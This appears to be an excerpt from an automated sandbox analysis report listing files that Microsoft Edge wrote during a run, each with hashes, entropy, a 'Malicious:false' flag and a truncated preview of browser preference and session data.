                                                                                                                                                                                                                                                                                              SHA-256:3C0FE2164C3E8564073C95948736F2E9914E2AA23055D653D3BF34DD7E7A8A4E
                                                                                                                                                                                                                                                                                              SHA-512:871BFB69C46BB3E4DFC8C0F08F1A01218D2A9268E39749990644F1420045A3D7636F5792E118D6BAFE13F70E0E562166C32E83BB42EBB828A7407A0C7AF0E3F2
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:{"net":{"http_server_properties":{"servers":[{"anonymization":["IAAAABoAAABodHRwczovL3d3dy5nb29nbGVhcGlzLmNvbQAA",false],"server":"https://www.googleapis.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13380918023966331","port":443,"protocol_str":"quic"}],"anonymization":["GAAAABIAAABodHRwczovL2dvb2dsZS5jb20AAA==",false],"server":"https://clients2.google.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13380918026811779","port":443,"protocol_str":"quic"}],"anonymization":["JAAAAB0AAABodHRwczovL2dvb2dsZXVzZXJjb250ZW50LmNvbQAAAA==",false],"server":"https://clients2.googleusercontent.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13378419629489185","port":443,"protocol_str":"quic"}],"anonymization":["HAAAABUAAABodHRwczovL21pY3Jvc29mdC5jb20AAAA=",false],"server":"https://msedgeextensions.sf.tlu.dl.delivery.mp.microsoft.com","supports_spdy":true},{"anonymizatio

                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\fc0fc698-57f5-4ce4-932e-9e266b2a045a.tmp

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):1419
                                                                                                                                                                                                                                                                                              Entropy (8bit):5.336110615415376
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:24:YXsJZVMdmRdsBjZFRudFGRw6ma3yeesRds1yZFGJ/I3w6C1E6maPsQYhbxP7np+:YXs/tsbfc7leeEscgCgakhYhbx9+
                                                                                                                                                                                                                                                                                              MD5:7D870539B6C4EE40FA5CFD87A3D4BFEC
                                                                                                                                                                                                                                                                                              SHA1:F45BE07A3A05615856688219AFE6713EBABBAC2C
                                                                                                                                                                                                                                                                                              SHA-256:73513F7A38830E47624257EF04A4F73BF174FD1FEBAC172AA416BF6470930F90
                                                                                                                                                                                                                                                                                              SHA-512:90EABCE74F8CBB5FF1F96566E1293887BB3DB36C9E32F6C619D1EC7C9AAE504221CDEC2DD1468915A0A06A65E472C5446731838C89E665EBD9FA114F12261327
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:{"net":{"http_server_properties":{"servers":[{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13343492604479295","port":443,"protocol_str":"quic"}],"anonymization":["GAAAABIAAABodHRwczovL2dvb2dsZS5jb20AAA==",false],"server":"https://clients2.google.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13343492605127283","port":443,"protocol_str":"quic"}],"anonymization":["JAAAAB0AAABodHRwczovL2dvb2dsZXVzZXJjb250ZW50LmNvbQAAAA==",false],"server":"https://clients2.googleusercontent.com","supports_spdy":true},{"anonymization":["HAAAABUAAABodHRwczovL21pY3Jvc29mdC5jb20AAAA=",false],"server":"https://msedgeextensions.sf.tlu.dl.delivery.mp.microsoft.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13343492606741506","port":443,"protocol_str":"quic"}],"anonymization":["IAAAABoAAABodHRwczovL3d3dy5nb29nbGVhcGlzLmNvbQAA",false],"server":"https://www.googleapis.com","supports_spdy":true},{"anonymizatio

                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Nurturing\campaign_history

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x2, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):20480
                                                                                                                                                                                                                                                                                              Entropy (8bit):0.6949007314891732
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:12:TLSnAFUxOUDaabZXiDiIF8izX4fhhdWeci2oesJaYi3isal/d0dtdjiG1dMgrfNr:TLSOUOq0afDdWec9sJrl7ZWI7J5fc
                                                                                                                                                                                                                                                                                              MD5:52DE909D04514C10D7428B67A26BBDAC
                                                                                                                                                                                                                                                                                              SHA1:0371737559133042EBF793502ECDC403011376E4
                                                                                                                                                                                                                                                                                              SHA-256:B05BF68A882F04103FA0F53A61974AFB591B09010DDBD5139B67B9ECE073F388
                                                                                                                                                                                                                                                                                              SHA-512:A1A861BBE3D275229BD39E11A72D894D9838145876FB40D1E233D1637F26BD5C13FBCF329D7984E0F89C3D69D1177E0E852C47B2404AC4A161101EA6ED0C7DE0
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Pdf\pdfSQLite

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):6144
                                                                                                                                                                                                                                                                                              Entropy (8bit):0.7760088126912533
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:6:llBtlEuWk8rlnHpywFBDBjDMEF4gLuumwf7ImWP9K+A7iqxxOJO7LFsjBDvqhsD0:LBtiuWkKcwF11DM/FAf4ADsO7L0rqqD0
                                                                                                                                                                                                                                                                                              MD5:05A4622364DF7AA77CC521602EFCBFBD
                                                                                                                                                                                                                                                                                              SHA1:BEF53821EA5B40A9E83A8488E21464FDAC9EDAC5
                                                                                                                                                                                                                                                                                              SHA-256:AAC65945A223FB9E4AC5647676AA603E8703EAEF7716723976AC99007A9D4C55
                                                                                                                                                                                                                                                                                              SHA-512:7472DA768111899CF9C61707F80AEE706CE6CC33163A8A4FD3C524920B03305F7507B82DEF18E7A1A7965B879487F54B86E2744436F31951DEB540DB4C1D4820
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Preferences (copy)

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):9261
                                                                                                                                                                                                                                                                                              Entropy (8bit):5.098540041339969
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:192:stkSWsfgsZihnkAaU3T88bV+FiA66WtaFIMYIP+YJ:stk5sfgfhxPbGix6WtaTYG
                                                                                                                                                                                                                                                                                              MD5:104022127F755F994BA7CAB36AFF0680
                                                                                                                                                                                                                                                                                              SHA1:A987BA328707BB66AD30BD4D708CA251F13B5327
                                                                                                                                                                                                                                                                                              SHA-256:F70FAC7EEFFBA4CABB35E1AF343369A3E6C92CCA5893D67A1BD14C859E245694
                                                                                                                                                                                                                                                                                              SHA-512:1C43FDB15052E8C03DEEC494F957CB5339144070767926EEDBB38456F5A77164609901458B7D96810A6809984EA6037320303FA1F8C7A4AE81AE2BD1643D388A
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13378326020367279","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340900603634208","arbitration_using_experiment_config":false,"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"toolbar_extensions_hub_button_visibility":0,"underside_chat_bing_signed_in_status":false,"window_placement":{"bottom":974,"left":10,"maximized":true,"right":1060,"top":10,"work_area_bottom":984,"work_area_left":0,"work_area_right":1280,"work_area_top":0}},"browser_content_container_height":1023,"browser_content_container_width":1280,"browser_content_container_x":0,"browser_content_container_y":0,"continuous_migration":{"ci_correction_for_holdout_treatment_state":1},"countryid_at_install":17224,"custom_links":{"list":[]},"default_apps_install_state":3,"dips_timer_last_update":"13378326019801415","domain_dive

                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Preferences~RF3bd85.TMP (copy)

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):9261
                                                                                                                                                                                                                                                                                              Entropy (8bit):5.098540041339969
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:192:stkSWsfgsZihnkAaU3T88bV+FiA66WtaFIMYIP+YJ:stk5sfgfhxPbGix6WtaTYG
                                                                                                                                                                                                                                                                                              MD5:104022127F755F994BA7CAB36AFF0680
                                                                                                                                                                                                                                                                                              SHA1:A987BA328707BB66AD30BD4D708CA251F13B5327
                                                                                                                                                                                                                                                                                              SHA-256:F70FAC7EEFFBA4CABB35E1AF343369A3E6C92CCA5893D67A1BD14C859E245694
                                                                                                                                                                                                                                                                                              SHA-512:1C43FDB15052E8C03DEEC494F957CB5339144070767926EEDBB38456F5A77164609901458B7D96810A6809984EA6037320303FA1F8C7A4AE81AE2BD1643D388A
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13378326020367279","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340900603634208","arbitration_using_experiment_config":false,"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"toolbar_extensions_hub_button_visibility":0,"underside_chat_bing_signed_in_status":false,"window_placement":{"bottom":974,"left":10,"maximized":true,"right":1060,"top":10,"work_area_bottom":984,"work_area_left":0,"work_area_right":1280,"work_area_top":0}},"browser_content_container_height":1023,"browser_content_container_width":1280,"browser_content_container_x":0,"browser_content_container_y":0,"continuous_migration":{"ci_correction_for_holdout_treatment_state":1},"countryid_at_install":17224,"custom_links":{"list":[]},"default_apps_install_state":3,"dips_timer_last_update":"13378326019801415","domain_dive

                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Preferences~RF403b5.TMP (copy)

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):9261
                                                                                                                                                                                                                                                                                              Entropy (8bit):5.098540041339969
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:192:stkSWsfgsZihnkAaU3T88bV+FiA66WtaFIMYIP+YJ:stk5sfgfhxPbGix6WtaTYG
                                                                                                                                                                                                                                                                                              MD5:104022127F755F994BA7CAB36AFF0680
                                                                                                                                                                                                                                                                                              SHA1:A987BA328707BB66AD30BD4D708CA251F13B5327
                                                                                                                                                                                                                                                                                              SHA-256:F70FAC7EEFFBA4CABB35E1AF343369A3E6C92CCA5893D67A1BD14C859E245694
                                                                                                                                                                                                                                                                                              SHA-512:1C43FDB15052E8C03DEEC494F957CB5339144070767926EEDBB38456F5A77164609901458B7D96810A6809984EA6037320303FA1F8C7A4AE81AE2BD1643D388A
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13378326020367279","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340900603634208","arbitration_using_experiment_config":false,"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"toolbar_extensions_hub_button_visibility":0,"underside_chat_bing_signed_in_status":false,"window_placement":{"bottom":974,"left":10,"maximized":true,"right":1060,"top":10,"work_area_bottom":984,"work_area_left":0,"work_area_right":1280,"work_area_top":0}},"browser_content_container_height":1023,"browser_content_container_width":1280,"browser_content_container_x":0,"browser_content_container_y":0,"continuous_migration":{"ci_correction_for_holdout_treatment_state":1},"countryid_at_install":17224,"custom_links":{"list":[]},"default_apps_install_state":3,"dips_timer_last_update":"13378326019801415","domain_dive

                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Preferences~RF478e5.TMP (copy)

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):9261
                                                                                                                                                                                                                                                                                              Entropy (8bit):5.098540041339969
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:192:stkSWsfgsZihnkAaU3T88bV+FiA66WtaFIMYIP+YJ:stk5sfgfhxPbGix6WtaTYG
                                                                                                                                                                                                                                                                                              MD5:104022127F755F994BA7CAB36AFF0680
                                                                                                                                                                                                                                                                                              SHA1:A987BA328707BB66AD30BD4D708CA251F13B5327
                                                                                                                                                                                                                                                                                              SHA-256:F70FAC7EEFFBA4CABB35E1AF343369A3E6C92CCA5893D67A1BD14C859E245694
                                                                                                                                                                                                                                                                                              SHA-512:1C43FDB15052E8C03DEEC494F957CB5339144070767926EEDBB38456F5A77164609901458B7D96810A6809984EA6037320303FA1F8C7A4AE81AE2BD1643D388A
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13378326020367279","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340900603634208","arbitration_using_experiment_config":false,"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"toolbar_extensions_hub_button_visibility":0,"underside_chat_bing_signed_in_status":false,"window_placement":{"bottom":974,"left":10,"maximized":true,"right":1060,"top":10,"work_area_bottom":984,"work_area_left":0,"work_area_right":1280,"work_area_top":0}},"browser_content_container_height":1023,"browser_content_container_width":1280,"browser_content_container_x":0,"browser_content_container_y":0,"continuous_migration":{"ci_correction_for_holdout_treatment_state":1},"countryid_at_install":17224,"custom_links":{"list":[]},"default_apps_install_state":3,"dips_timer_last_update":"13378326019801415","domain_dive

                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Secure Preferences (copy)

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):25012
                                                                                                                                                                                                                                                                                              Entropy (8bit):5.5671885608363025
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:768:AY0J0uWPZhfhs8F1+UoAYDCx9Tuqh0VfUC9xbog/OVbOCZcrwGpGtu/:AY0J0uWPZhfhsu1ja6TZVzt8
                                                                                                                                                                                                                                                                                              MD5:A37A898DCDCE7E529487FA0F803F884C
                                                                                                                                                                                                                                                                                              SHA1:53C2A0240040C351E220CABCE8903FCD02B9100C
                                                                                                                                                                                                                                                                                              SHA-256:6245ADF58AD55F8704391A9D6031629CFDD704B91B814A197F066D012F0EC426
                                                                                                                                                                                                                                                                                              SHA-512:D838D97270DD90F2409F4499525121D6BCCA679295E2B9F729DF91752046F78754D89261D0889E56B0C5B4D54792D195AA3F8062CCF3EFB73F333F8D40A0AEB0
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:{"edge_fundamentals_appdefaults":{"ess_lightweight_version":101},"ess_kv_states":{"restore_on_startup":{"closed_notification":false,"decrypt_success":true,"key":"restore_on_startup","notification_popup_count":0},"startup_urls":{"closed_notification":false,"decrypt_success":true,"key":"startup_urls","notification_popup_count":0},"template_url_data":{"closed_notification":false,"decrypt_success":true,"key":"template_url_data","notification_popup_count":0}},"extensions":{"settings":{"ahfgeienlihckogmohjhadlkjgocpleb":{"active_permissions":{"api":["management","system.display","system.storage","webstorePrivate","system.cpu","system.memory","system.network"],"explicit_host":[],"manifest_permissions":[],"scriptable_host":[]},"app_launcher_ordinal":"t","commands":{},"content_settings":[],"creation_flags":1,"events":[],"first_install_time":"13378326019029821","from_webstore":false,"incognito_content_settings":[],"incognito_preferences":{},"last_update_time":"13378326019029821","location":5,"ma

                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Secure Preferences~RF3b660.TMP (copy)

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):25012
                                                                                                                                                                                                                                                                                              Entropy (8bit):5.5671885608363025
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:768:AY0J0uWPZhfhs8F1+UoAYDCx9Tuqh0VfUC9xbog/OVbOCZcrwGpGtu/:AY0J0uWPZhfhsu1ja6TZVzt8
                                                                                                                                                                                                                                                                                              MD5:A37A898DCDCE7E529487FA0F803F884C
                                                                                                                                                                                                                                                                                              SHA1:53C2A0240040C351E220CABCE8903FCD02B9100C
                                                                                                                                                                                                                                                                                              SHA-256:6245ADF58AD55F8704391A9D6031629CFDD704B91B814A197F066D012F0EC426
                                                                                                                                                                                                                                                                                              SHA-512:D838D97270DD90F2409F4499525121D6BCCA679295E2B9F729DF91752046F78754D89261D0889E56B0C5B4D54792D195AA3F8062CCF3EFB73F333F8D40A0AEB0
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:{"edge_fundamentals_appdefaults":{"ess_lightweight_version":101},"ess_kv_states":{"restore_on_startup":{"closed_notification":false,"decrypt_success":true,"key":"restore_on_startup","notification_popup_count":0},"startup_urls":{"closed_notification":false,"decrypt_success":true,"key":"startup_urls","notification_popup_count":0},"template_url_data":{"closed_notification":false,"decrypt_success":true,"key":"template_url_data","notification_popup_count":0}},"extensions":{"settings":{"ahfgeienlihckogmohjhadlkjgocpleb":{"active_permissions":{"api":["management","system.display","system.storage","webstorePrivate","system.cpu","system.memory","system.network"],"explicit_host":[],"manifest_permissions":[],"scriptable_host":[]},"app_launcher_ordinal":"t","commands":{},"content_settings":[],"creation_flags":1,"events":[],"first_install_time":"13378326019029821","from_webstore":false,"incognito_content_settings":[],"incognito_preferences":{},"last_update_time":"13378326019029821","location":5,"ma

                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage\000003.log

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):213
                                                                                                                                                                                                                                                                                              Entropy (8bit):2.7541301583060975
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:3:S8ltHlS+QUl1ASEGhTFljljljljljljljljl:S85aEFljljljljljljljljl
                                                                                                                                                                                                                                                                                              MD5:046CC08D163FC4578CD1B77A5D0965AC
                                                                                                                                                                                                                                                                                              SHA1:92F503E605C30974BAF385F1619F1269B81DEC57
                                                                                                                                                                                                                                                                                              SHA-256:693A60684AA9FF4F01CB6027E9C938F4701C0C898AFC224A0776CB1E18E87166
                                                                                                                                                                                                                                                                                              SHA-512:E8B1DF36A237BCBBAD897146CA247EDF75466B2A4030FEC620C46932B5C31137F2931CD2758534E4308AED3FB9CC40EDF2D7646A38530BCC5E6D7069C19A3B1F
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:*...#................version.1..namespace-..&f.................&f.................&f.................&f.................&f.................&f.................&f.................&f.................&f...............

                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage\LOG

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):324
                                                                                                                                                                                                                                                                                              Entropy (8bit):5.02157589352817
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:6:7LWIq2P923oH+TcwtrQMxIFUt8OLWZmw+OLF7kwO923oH+TcwtrQMFLJ:7yIv4YebCFUt8Oi/+OJ5LYebtJ
                                                                                                                                                                                                                                                                                              MD5:E9E3CE919416A712AF9FFDB58B327330
                                                                                                                                                                                                                                                                                              SHA1:28FB147071DB733C8EFD2CE1AEEA124BB2173913
                                                                                                                                                                                                                                                                                              SHA-256:DD63AE33022DEAA49C1B80C0AACD1E23667E03E0A185B975465DF790B0B9A81C
                                                                                                                                                                                                                                                                                              SHA-512:6CF0AF838327840D758C374D1F7216EC0AF7327F39437BA03E539FF9B69247E2EA4CC2FF0C2C2481961D0B2EF0D4A4130E7F720504E7D27D00875F508528DC56
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:2024/12/10-12:40:20.333 1e20 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage/MANIFEST-000001.2024/12/10-12:40:20.337 1e20 Recovering log #3.2024/12/10-12:40:20.345 1e20 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage/000003.log .

                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage\LOG.old (copy)

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):324
                                                                                                                                                                                                                                                                                              Entropy (8bit):5.02157589352817
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:6:7LWIq2P923oH+TcwtrQMxIFUt8OLWZmw+OLF7kwO923oH+TcwtrQMFLJ:7yIv4YebCFUt8Oi/+OJ5LYebtJ
                                                                                                                                                                                                                                                                                              MD5:E9E3CE919416A712AF9FFDB58B327330
                                                                                                                                                                                                                                                                                              SHA1:28FB147071DB733C8EFD2CE1AEEA124BB2173913
                                                                                                                                                                                                                                                                                              SHA-256:DD63AE33022DEAA49C1B80C0AACD1E23667E03E0A185B975465DF790B0B9A81C
                                                                                                                                                                                                                                                                                              SHA-512:6CF0AF838327840D758C374D1F7216EC0AF7327F39437BA03E539FF9B69247E2EA4CC2FF0C2C2481961D0B2EF0D4A4130E7F720504E7D27D00875F508528DC56
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:2024/12/10-12:40:20.333 1e20 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage/MANIFEST-000001.2024/12/10-12:40:20.337 1e20 Recovering log #3.2024/12/10-12:40:20.345 1e20 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage/000003.log .

                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sessions\Session_13378326021540506

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):2222
                                                                                                                                                                                                                                                                                              Entropy (8bit):3.4481313131484175
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:48:3tjpUBz8oqg/1dS71mgFEwQgoSh+pSh+5qGHDarzSQy:3uOrA+zd
                                                                                                                                                                                                                                                                                              MD5:CC69EB9695FD991F7FF82B09D180E90C
                                                                                                                                                                                                                                                                                              SHA1:22119635FB607FF2192A67FA3B6CB02F50AFC93D
                                                                                                                                                                                                                                                                                              SHA-256:496710E8A8A35C5B9DD15390D811E2EF7269B2D369C8F73B2D39CAD46E082922
                                                                                                                                                                                                                                                                                              SHA-512:6336E58D5DFD48E0A49F1094FC65F599C794E29CA8E6DD569D659894CC92C402CCA82166CF9C70E6CE506A66B7149550478484A75F22C0EF3108A4B7A8E682B2
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:SNSS..........q..............q......"...q..............q..........q..........q..........q....!.....q..................................q...q1..,......q$...b266fa59_d01b_4236_a661_aab23c151faa......q..........q....V.]...........q......q....................5..0......q&...{98952893-68FF-4A5D-A164-705C709ED3DB}........q.............q..........q....!.....q..................................q...q1..,......q$...911d35d2_581a_4099_a900_eecb7693c14d......q..........q...... ...........q..............q....9...file:///C:/Users/user/AppData/Local/Temp/1262855704.pdf...............!.......................................................................................................h.]..(..i.]..(..H.......`.......................................................................z...9...f.i.l.e.:./././.C.:./.U.s.e.r.s./.a.l.f.o.n.s./.A.p.p.D.a.t.a./.L.o.c.a.l./.T.e.m.p./.1.2.6.2.8.5.5.7.0.4...p.d.f.......................................8.......0.......8.................................................

                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Shortcuts

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 5, cookie 0x2, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):20480
                                                                                                                                                                                                                                                                                              Entropy (8bit):0.44194574462308833
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:12:TLiNCcUMskMVcIWGhWxBzEXx7AAQlvsdFxOUwa5qgufTJpbZ75fOS:TLisVMnYPhIY5Qlvsd6UwccNp15fB
                                                                                                                                                                                                                                                                                              MD5:B35F740AA7FFEA282E525838EABFE0A6
                                                                                                                                                                                                                                                                                              SHA1:A67822C17670CCE0BA72D3E9C8DA0CE755A3421A
                                                                                                                                                                                                                                                                                              SHA-256:5D599596D116802BAD422497CF68BE59EEB7A9135E3ED1C6BEACC48F73827161
                                                                                                                                                                                                                                                                                              SHA-512:05C0D33516B2C1AB6928FB34957AD3E03CB0A8B7EEC0FD627DD263589655A16DEA79100B6CC29095C3660C95FD2AFB2E4DD023F0597BD586DD664769CABB67F8
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:SQLite format 3......@ ..........................................................................j..........g....."....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database\LOG

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):352
                                                                                                                                                                                                                                                                                              Entropy (8bit):5.06846550240484
